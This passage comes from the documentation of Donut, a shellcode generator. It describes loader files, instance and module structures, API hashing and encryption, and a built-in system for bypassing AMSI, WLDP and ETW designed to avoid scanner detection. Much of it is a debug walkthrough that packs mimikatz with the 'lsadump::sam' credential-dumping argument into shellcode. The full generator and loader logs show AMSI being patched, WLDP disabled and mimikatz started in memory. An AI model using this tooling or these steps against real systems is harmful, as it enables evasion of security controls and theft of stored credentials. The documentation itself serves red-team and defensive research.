<td>Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).</td>
</tr>
<tr>
<td>loader/http_client.c</td>
<td>Downloads a module from remote staging server into memory.</td>
</tr>
<tr>
<td>loader/peb.c</td>
<td>Used to resolve the address of DLL functions via Process Environment Block (PEB).</td>
</tr>
<tr>
<td>loader/clib.c</td>
<td>Replaces common C library functions like memcmp, memcpy and memset.</td>
</tr>
<tr>
<td>loader/getpc.c</td>
<td>Assembly code stub to return the value of the EIP register.</td>
</tr>
<tr>
<td>loader/inject.c</td>
<td>Simple process injector for Windows that can be used for testing the loader.</td>
</tr>
<tr>
<td>loader/runsc.c</td>
<td>Simple shellcode runner for Linux and Windows that can be used for testing the loader.</td>
</tr>
<tr>
<td>loader/exe2h/exe2h.c</td>
<td>Extracts the machine code from compiled loader and saves as array to C header and Go files.</td>
</tr>
</table>
<h2 id="instance">7. Donut Instance</h2>
<p>The loader will always contain an <var>Instance</var> which can be viewed simply as a configuration. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, if encryption is enabled, it will decrypt the data before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>. The data will be decompressed if required and only then is it loaded into memory for execution.</p>
<h2 id="module">8. Donut Module</h2>
<p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
<span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE/DLL/JS/VBS</span>
<span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread</span>
<span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// indicates engine used for compression</span>
<span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for both managed and unmanaged DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// convert param to unicode before passing to DLL function</span>
<span style='color:#800000; font-weight:bold; '>char</span> sig<span style='color:#808030; '>[</span>DONUT_SIG_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to verify decryption</span>
uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// hash of sig, to verify decryption was ok</span>
uint32_t zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compressed size of EXE/DLL/JS/VBS file</span>
uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// real size of EXE/DLL/JS/VBS file</span>
uint8_t data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/JS/VBS file</span>
<span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
</pre>
<h2 id="hashing">9. Win32 API Hashing</h2>
<p>A hash function called <a href="https://github.com/odzhan/maru">Maru</a> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the <a href="https://tinycrypt.wordpress.com/2017/01/11/asmcodes-speck/">SPECK</a> block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
<h2 id="encryption">10. Symmetric Encryption</h2>
<p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
<span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
<span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
<span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
</pre>
<p><a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a>, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut loader. Future releases will support downloading a key via DNS and also asymmetric encryption.</p>
<h2 id="bypass">11. Bypasses for AMSI/WLDP/ETW</h2>
<p>Donut includes a bypass system for AMSI, WLDP, and ETW. Currently, Donut can bypass:</p>
<ul>
<li>AMSI in .NET v4.8</li>
<li>Event Tracing for Windows (ETW) logging Assembly loads</li>
<li>Device Guard policy preventing dynamically generated code from executing.</li>
</ul>
<p>You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c. Each bypass implements the DisableAMSI with the signature <code>BOOL DisableAMSI(PDONUT_INSTANCE inst)</code> and DisableWLDP with <code>BOOL DisableWLDP(PDONUT_INSTANCE inst)</code>, both of which have a corresponding preprocessor directive. We have several <code>#if defined</code> blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass for AMSI is called <code>BYPASS_AMSI_A</code>. If donut is built with that variable defined, then that bypass will be used.</p>
<p>Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.</p>
<p>Another benefit of this design is that you may write your own AMSI/WLDP/ETW bypass. To build Donut with your new bypass, use an <code>if defined</code> block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.</p>
<p>If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.</p>
<h2 id="debug">12. Debugging The Generator and Loader</h2>
<p>The loader is capable of displaying detailed information about each step of file execution and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make on Windows.</p>
<pre>
nmake debug -f Makefile.msvc
make debug -f Makefile.mingw
</pre>
<p>Use Donut to create a shellcode as you normally would and a file called <code>instance</code> will be saved to disk. The following example embeds mimikatz.exe in the loader using the Xpress Huffman compression algorithm. It also tells the loader to run the entrypoint as a thread, so that when mimikatz calls an exit-related API, it simply exits the thread. </p>
<pre>
C:\hub\donut>donut -t -z5 mimikatz.exe -p"lsadump::sam exit"
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
DEBUG: donut.c:1505:DonutCreate(): Entering.
DEBUG: donut.c:1283:validate_loader_cfg(): Validating loader configuration.
DEBUG: donut.c:1380:validate_loader_cfg(): Loader configuration passed validation.
DEBUG: donut.c:459:read_file_info(): Entering.
DEBUG: donut.c:467:read_file_info(): Checking extension of mimikatz.exe
DEBUG: donut.c:475:read_file_info(): Extension is ".exe"
DEBUG: donut.c:491:read_file_info(): File is EXE
DEBUG: donut.c:503:read_file_info(): Mapping mimikatz.exe into memory
DEBUG: donut.c:245:map_file(): Entering.
DEBUG: donut.c:531:read_file_info(): Checking characteristics
DEBUG: donut.c:582:read_file_info(): Leaving with error : 0
DEBUG: donut.c:1446:validate_file_cfg(): Validating configuration for input file.
DEBUG: donut.c:1488:validate_file_cfg(): Validation passed.
DEBUG: donut.c:674:build_module(): Entering.
DEBUG: donut.c:381:compress_file(): Reading fragment and workspace size
DEBUG: donut.c:387:compress_file(): workspace size : 1415999 | fragment size : 5161
DEBUG: donut.c:390:compress_file(): Allocating memory for compressed data.
DEBUG: donut.c:396:compress_file(): Compressing 0000024E9D7E0000 to 0000024E9DA50080 with RtlCompressBuffer(XPRESS HUFFMAN)
DEBUG: donut.c:433:compress_file(): Original file size : 1013912 | Compressed : 478726
DEBUG: donut.c:434:compress_file(): File size reduced by 53%
DEBUG: donut.c:436:compress_file(): Leaving with error : 0
DEBUG: donut.c:684:build_module(): Assigning 478726 bytes of 0000024E9DA50080 to data
DEBUG: donut.c:695:build_module(): Allocating 480054 bytes of memory for DONUT_MODULE
DEBUG: donut.c:772:build_module(): Copying data to module
DEBUG: donut.c:784:build_module(): Leaving with error : 0
DEBUG: donut.c:804:build_instance(): Entering.
DEBUG: donut.c:807:build_instance(): Allocating memory for instance
DEBUG: donut.c:814:build_instance(): The size of module is 480054 bytes. Adding to size of instance.
DEBUG: donut.c:817:build_instance(): Total length of instance : 483718
DEBUG: donut.c:846:build_instance(): Generating random key for instance
DEBUG: donut.c:855:build_instance(): Generating random key for module
DEBUG: donut.c:864:build_instance(): Generating random string to verify decryption
DEBUG: donut.c:871:build_instance(): Generating random IV for Maru hash
DEBUG: donut.c:879:build_instance(): Generating hashes for API using IV: 546E2FF018FD2A54
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : LoadLibraryA = ABB30FFE918BCF83
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetProcAddress = EF2C0663C0CDDC21
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetModuleHandleA = D40916771ECED480
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualAlloc = E445DF6F06219E85
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualFree = C6C992D6040B85A8
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualQuery = 556BF46109D12C9E
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualProtect = 032546126BB99713
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : Sleep = DEB476FF0E3D71E8
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : MultiByteToWideChar = A0DD238846F064F4
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetUserDefaultLCID = 03DE3865FC2DF17B
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : WaitForSingleObject = 40FCB82879AAB610
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : CreateThread = 954101E48C1D54F5
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetThreadContext = 18669E0FDC3FD0B8
DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetCurrentThread = EB6E7C47D574D9F9
DEBUG: donut.c:892:build_instance(): Hash for shell32.dll : CommandLineToArgvW = EFD410EF534D57C3
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreate = A5AA007611CB6580
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreateVector = D5CEC16DD247A68A
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayPutElement = 6B140B7B87F27359
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayDestroy = C2FA65C58C68FC6C
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetLBound = ED5A331176BB8DDA
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetUBound = EA0D8BE258DC67DA
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysAllocString = 3A7BBDEAA1DC3354
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysFreeString = EEB92DFE18B7C306
DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : LoadTypeLib = 687DD816E578C4E7
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCrackUrlA = B0F95D86327741EC
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetOpenA = BDD70375BB72B131
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetConnectA = E74A4DD56C6B3154
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetSetOptionA = 527C502C0BC36267
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetReadFile = 055C3E8A4CF21475
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCloseHandle = 4D1965E404D783BA
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpOpenRequestA = CC736E0143DB8F2A
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpSendRequestA = C87BFE8578BB0049
DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpQueryInfoA = FC7CC8D82764DFBF
DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CorBindToRuntime = 6F6432B588D39C8D
DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CLRCreateInstance = 2828FB8F68349704
DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoInitializeEx = 9752F1AA167F8E79
DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoCreateInstance = 8211344A519AF3BA
DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoUninitialize = FF0605E1258BEE44
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualUnicodeString = D5CEDA5C642834D7
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualString = A69EAF72442222A4
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlUnicodeStringToAnsiString = 4DBA40D90962E1D6
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlInitUnicodeString = A1143A47656B2526
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserThread = 62FF88CDC045477E
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserProcess = E20BCE2C11E82C7B
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlCreateUnicodeString = A469294ED1E1D8DC
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlGetCompressionWorkSpaceSize = 61E26E7C5DD38D2C
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlDecompressBufferEx = 145C8CF24F5EAF3E
DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : NtContinue = 12ACA3AD3CC20AF5
DEBUG: donut.c:895:build_instance(): Setting number of API to 48
DEBUG: donut.c:898:build_instance(): Setting DLL names to ole32;oleaut32;wininet;mscoree;shell32
DEBUG: donut.c:941:build_instance(): Copying strings required to bypass AMSI
DEBUG: donut.c:949:build_instance(): Copying strings required to bypass WLDP
DEBUG: donut.c:960:build_instance(): Copying strings required to replace command line.
DEBUG: donut.c:968:build_instance(): Copying strings required to intercept exit-related API
DEBUG: donut.c:1018:build_instance(): Copying module data to instance
DEBUG: donut.c:1024:build_instance(): Encrypting instance
DEBUG: donut.c:1042:build_instance(): Leaving with error : 0
DEBUG: donut.c:1210:build_loader(): Inserting opcodes
DEBUG: donut.c:1248:build_loader(): Copying 29548 bytes of x86 + amd64 shellcode
DEBUG: donut.c:1090:save_loader(): Saving instance 0000024E9DE90080 to file. 483718 bytes.
DEBUG: donut.c:1061:save_file(): Entering.
DEBUG: donut.c:1065:save_file(): Writing 483718 bytes of 0000024E9DE90080 to instance
DEBUG: donut.c:1070:save_file(): Leaving with error : 0
DEBUG: donut.c:1139:save_loader(): Saving loader as binary
DEBUG: donut.c:1172:save_loader(): Leaving with error : 0
DEBUG: donut.c:1540:DonutCreate(): Leaving with error : 0
[ Instance type : Embedded
[ Module file : "mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : Xpress Huffman (Reduced by 53%)
[ File type : EXE
[ Parameters : lsadump::sam exit
[ Target CPU : x86+amd64
[ AMSI/WDLP : continue
[ Shellcode : "loader.bin"
DEBUG: donut.c:1556:DonutDelete(): Entering.
DEBUG: donut.c:1562:DonutDelete(): Releasing memory for module.
DEBUG: donut.c:1568:DonutDelete(): Releasing memory for configuration.
DEBUG: donut.c:1574:DonutDelete(): Releasing memory for loader.
DEBUG: donut.c:289:unmap_file(): Releasing compressed data.
DEBUG: donut.c:294:unmap_file(): Unmapping input file.
DEBUG: donut.c:299:unmap_file(): Closing input file.
DEBUG: donut.c:1580:DonutDelete(): Leaving.
</pre>
<p>If successfully created, there should now be a file called "instance" in the same directory as the loader. Pass the instance file as a parameter to loader.exe which should also be in the same directory.</p>
<pre>
C:\hub\donut>loader instance
Running...
DEBUG: loader/loader.c:109:MainProc(): Maru IV : 546E2FF018FD2A54
DEBUG: loader/loader.c:112:MainProc(): Resolving address for VirtualAlloc() : E445DF6F06219E85
DEBUG: loader/loader.c:116:MainProc(): Resolving address for VirtualFree() : C6C992D6040B85A8
DEBUG: loader/loader.c:120:MainProc(): Resolving address for RtlExitUserProcess() : E20BCE2C11E82C7B
DEBUG: loader/loader.c:129:MainProc(): VirtualAlloc : 00007FFFD1DAA190 VirtualFree : 00007FFFD1DAA180
DEBUG: loader/loader.c:131:MainProc(): Allocating 483718 bytes of RW memory
DEBUG: loader/loader.c:143:MainProc(): Copying 483718 bytes of data to memory 00000178FEA30000
DEBUG: loader/loader.c:147:MainProc(): Zero initializing PDONUT_ASSEMBLY
DEBUG: loader/loader.c:156:MainProc(): Decrypting 483718 bytes of instance
DEBUG: loader/loader.c:163:MainProc(): Generating hash to verify decryption
DEBUG: loader/loader.c:165:MainProc(): Instance : 33C49D5864287AEF | Result : 33C49D5864287AEF
DEBUG: loader/loader.c:172:MainProc(): Resolving LoadLibraryA
DEBUG: loader/loader.c:189:MainProc(): Loading ole32
DEBUG: loader/loader.c:189:MainProc(): Loading oleaut32
DEBUG: loader/loader.c:189:MainProc(): Loading wininet
DEBUG: loader/loader.c:189:MainProc(): Loading mscoree
DEBUG: loader/loader.c:189:MainProc(): Loading shell32
DEBUG: loader/loader.c:193:MainProc(): Resolving 48 API
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EF2C0663C0CDDC21
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D40916771ECED480
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E445DF6F06219E85
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C6C992D6040B85A8
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 556BF46109D12C9E
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 032546126BB99713
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for DEB476FF0E3D71E8
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A0DD238846F064F4
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 03DE3865FC2DF17B
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 40FCB82879AAB610
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 954101E48C1D54F5
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 18669E0FDC3FD0B8
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EB6E7C47D574D9F9
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EFD410EF534D57C3
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A5AA007611CB6580
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEC16DD247A68A
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6B140B7B87F27359
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C2FA65C58C68FC6C
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for ED5A331176BB8DDA
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EA0D8BE258DC67DA
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 3A7BBDEAA1DC3354
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EEB92DFE18B7C306
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 687DD816E578C4E7
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for B0F95D86327741EC
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for BDD70375BB72B131
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E74A4DD56C6B3154
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 527C502C0BC36267
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 055C3E8A4CF21475
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4D1965E404D783BA
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for CC736E0143DB8F2A
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C87BFE8578BB0049
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FC7CC8D82764DFBF
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6F6432B588D39C8D
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 2828FB8F68349704
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 9752F1AA167F8E79
DEBUG: peb.c:87:FindExport(): 9752f1aa167f8e79 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 8211344A519AF3BA
DEBUG: peb.c:87:FindExport(): 8211344a519af3ba is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FF0605E1258BEE44
DEBUG: peb.c:87:FindExport(): ff0605e1258bee44 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEDA5C642834D7
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A69EAF72442222A4
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4DBA40D90962E1D6
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A1143A47656B2526
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 62FF88CDC045477E
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E20BCE2C11E82C7B
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A469294ED1E1D8DC
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 61E26E7C5DD38D2C
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 145C8CF24F5EAF3E
DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 12ACA3AD3CC20AF5
DEBUG: loader/loader.c:218:MainProc(): Module is embedded.
DEBUG: bypass.c:112:DisableAMSI(): Length of AmsiScanBufferStub is 36 bytes.
DEBUG: bypass.c:122:DisableAMSI(): Overwriting AmsiScanBuffer
DEBUG: bypass.c:137:DisableAMSI(): Length of AmsiScanStringStub is 36 bytes.
DEBUG: bypass.c:147:DisableAMSI(): Overwriting AmsiScanString
DEBUG: loader/loader.c:226:MainProc(): DisableAMSI OK
DEBUG: bypass.c:326:DisableWLDP(): Length of WldpQueryDynamicCodeTrustStub is 20 bytes.
DEBUG: bypass.c:350:DisableWLDP(): Length of WldpIsClassInApprovedListStub is 36 bytes.
DEBUG: loader/loader.c:232:MainProc(): DisableWLDP OK
DEBUG: loader/loader.c:239:MainProc(): Compression engine is 5
DEBUG: loader/loader.c:242:MainProc(): Allocating 1015240 bytes of memory for decompressed file and module information
DEBUG: loader/loader.c:252:MainProc(): Duplicating DONUT_MODULE
DEBUG: loader/loader.c:256:MainProc(): Decompressing 478726 -> 1013912
DEBUG: loader/loader.c:270:MainProc(): WorkSpace size : 1415999 | Fragment size : 5161
DEBUG: loader/loader.c:277:MainProc(): Decompressing with RtlDecompressBufferEx(XPRESS HUFFMAN)
DEBUG: loader/loader.c:302:MainProc(): Checking type of module
DEBUG: inmem_pe.c:103:RunPE(): Allocating 1019904 (0xf9000) bytes of RWX memory for file
DEBUG: inmem_pe.c:112:RunPE(): Copying Headers
DEBUG: inmem_pe.c:115:RunPE(): Copying each section to RWX memory 00000178FF170000
DEBUG: inmem_pe.c:127:RunPE(): Applying Relocations
DEBUG: inmem_pe.c:151:RunPE(): Processing the Import Table
DEBUG: inmem_pe.c:159:RunPE(): Loading ADVAPI32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading Cabinet.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading CRYPT32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading cryptdll.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading DNSAPI.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading FLTLIB.DLL
DEBUG: inmem_pe.c:159:RunPE(): Loading NETAPI32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading ole32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading OLEAUT32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading RPCRT4.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading SHLWAPI.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading SAMLIB.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading Secur32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading SHELL32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading USER32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading USERENV.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading VERSION.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading HID.DLL
DEBUG: inmem_pe.c:159:RunPE(): Loading SETUPAPI.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading WinSCard.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading WINSTA.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading WLDAP32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading advapi32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading msasn1.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading ntdll.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading netapi32.dll
DEBUG: inmem_pe.c:159:RunPE(): Loading KERNEL32.dll
DEBUG: inmem_pe.c:182:RunPE(): Replacing KERNEL32.dll!ExitProcess with ntdll!RtlExitUserThread
DEBUG: inmem_pe.c:159:RunPE(): Loading msvcrt.dll
DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!exit with ntdll!RtlExitUserThread
DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_cexit with ntdll!RtlExitUserThread
DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_exit with ntdll!RtlExitUserThread
DEBUG: inmem_pe.c:196:RunPE(): Processing Delayed Import Table
DEBUG: inmem_pe.c:204:RunPE(): Loading bcrypt.dll
DEBUG: inmem_pe.c:204:RunPE(): Loading ncrypt.dll
DEBUG: inmem_pe.c:319:RunPE(): Setting command line: MTFM lsadump::sam exit
DEBUG: inmem_pe.c:433:SetCommandLineW(): Obtaining handle for kernelbase
DEBUG: inmem_pe.c:449:SetCommandLineW(): Searching 2161 pointers
DEBUG: inmem_pe.c:458:SetCommandLineW(): BaseUnicodeCommandLine at 00007FFFD1609E70 : loader instance
DEBUG: inmem_pe.c:466:SetCommandLineW(): New BaseUnicodeCommandLine at 00007FFFD1609E70 : MTFM lsadump::sam exit
DEBUG: inmem_pe.c:483:SetCommandLineW(): New BaseAnsiCommandLine at 00007FFFD1609E60 : MTFM lsadump::sam exit
DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting ucrtbase.dll!__p__acmdln "loader instance" to "MTFM lsadump::sam exit"
DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting ucrtbase.dll!__p__wcmdln "loader instance" to "MTFM lsadump::sam exit"
DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting msvcrt.dll!_acmdln "loader instance" to "MTFM lsadump::sam exit"
DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting msvcrt.dll!_wcmdln "loader instance" to "MTFM lsadump::sam exit"
DEBUG: inmem_pe.c:323:RunPE(): Wiping Headers from memory
DEBUG: inmem_pe.c:332:RunPE(): Creating thread for entrypoint of EXE : 00000178FF2007F8
.#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
